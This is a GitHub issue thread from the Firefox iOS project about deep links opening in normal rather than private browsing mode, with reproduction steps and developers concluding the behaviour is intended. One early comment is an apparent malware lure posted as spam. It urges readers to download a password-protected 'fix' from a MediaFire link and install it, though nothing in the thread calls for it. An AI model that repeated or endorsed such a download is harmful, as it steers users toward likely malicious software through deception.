### ISSUE TITLE
Ensure deep links open in corresponding mode based on current browsing mode (Private or Normal) 

### ISSUE THREAD

**Issue by alinamoldovan84** [mozilla-mobile/firefox-ios#21631] opened 2024-08-27 06:58 UTC
## Steps to reproduce
**Case 1:** 

1. FF is set as the default browser.
1. Make sure the Normal browsing mode is in use
1. Put the FF app in the background or force close it
1. Open a deep link (by tapping a link from other apps, using FF widgets, or using the context menu of the FF icon)
**Expected behavior**
The link opens in normal browsing mode (Currently it works correctly; nothing to change here)
**Actual behavior**
The link opens in normal browsing mode 

**Case 2:** 

1. FF is set as the default browser.
1. Make sure the Private browsing mode is in use
1. Make sure the "Close private tabs" toggle is disabled 
1. Put the FF app in the background or force close it
1. Open a deep link (by tapping a link from other apps, using FF widgets, or using the context menu of the FF icon)
**Expected behavior**
The link opens in private browsing mode 
**Actual behavior**
The link opens in normal browsing mode 

**Case 3:** 

1. FF is set as the default browser.
1. Make sure the Private browsing mode is in use
1. Make sure the "Close private tabs" toggle is enabled
1. Put the FF app in the background 
1. Open a deep link (by tapping a link from other apps, using FF widgets, or using the context menu of the FF icon)
**Expected behavior**
The link opens in private browsing mode 
**Actual behavior**
The link opens in normal browsing mode 

**Case 4:** 

1. FF is set as the default browser.
1. Make sure the Private browsing mode is in use
1. Make sure the "Close private tabs" toggle is enabled
1. Force close the FF app
1. Open a deep link (by tapping a link from other apps, using FF widgets, or using the context menu of the FF icon)
**Expected behavior**
The link opens in normal browsing mode (Currently it works correctly; nothing to change here)
**Actual behavior**
The link opens in normal browsing mode 

### Device & build information
* Device: iPhone 15+ (18.0) 
* Build version: 130 (44542) 
* First seen version: ? 
### Notes
Attachments: 

┆Issue is synchronized with this [Jira Task](https://mozilla-hub.atlassian.net/browse/FXIOS-9852)

**Comment by praveenking945** [comment] 2024-08-27 07:38
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by data-sync-user** [comment] 2024-08-28 12:41
➤ Alexandru Farcasanu commented:

Update for this ticket after investigations:

Case 1, Case 2 and Case 3 are working as expected. 
The only problem is Case 4, when "Close private tabs" toggle is enabled and we force close the app.
Going to find a fix for it!

cc: Norberto Andres Furlan

**Comment by nbhasin2** [comment] 2024-08-28 16:01
I can't reproduce this in general @alinamoldovan84 @dicarobinho for case 4

https://github.com/user-attachments/assets/c8e9b1de-83fd-4ce3-a101-156d4d37e27b

Case 4 is working as intended without Alex's fix

**Comment by nbhasin2** [comment] 2024-08-28 16:03
https://github.com/user-attachments/assets/eaca6723-daf1-4f54-b576-e690d0b14ad7

Case 3 is also working

**Comment by nbhasin2** [comment] 2024-08-28 16:06
If a case is a problem, please post a video @alinamoldovan84 in case I am doing something different and we can double check :)

**Comment by data-sync-user** [comment] 2024-08-29 12:45
➤ Alina Moldovan commented:

Confirming that I’m not able t reproduce anymote the case 2 and 3 anymore. 

Regarding the case 4 I agree that the expected resuts is questionalbe. 

Initially I considered that seence the private tabs should not persist the browsing mode shoud be resetted  and the normal mde should be used. 

But now, I realized that the option in seetings is to remove the already opend private tabs not to change the browsing mode. 

So, i agree if your decision is to keep the behavior as is. 

Nishant Bhasin Norberto Andres Furlan

**Comment by nbhasin2** [comment] 2024-08-29 16:00
I am okay with keeping it as is cc @afurlan-firefox

**Comment by data-sync-user** [comment] 2024-09-03 13:55
➤ Norberto Andres Furlan commented:

I think that makes sense. I am closing the ticket then. Thanks for the investigation Alexandru Farcasanu and Nishant Bhasin

**Closed** 2024-10-13 07:58 UTC
Labels: Bug 🐞, S3
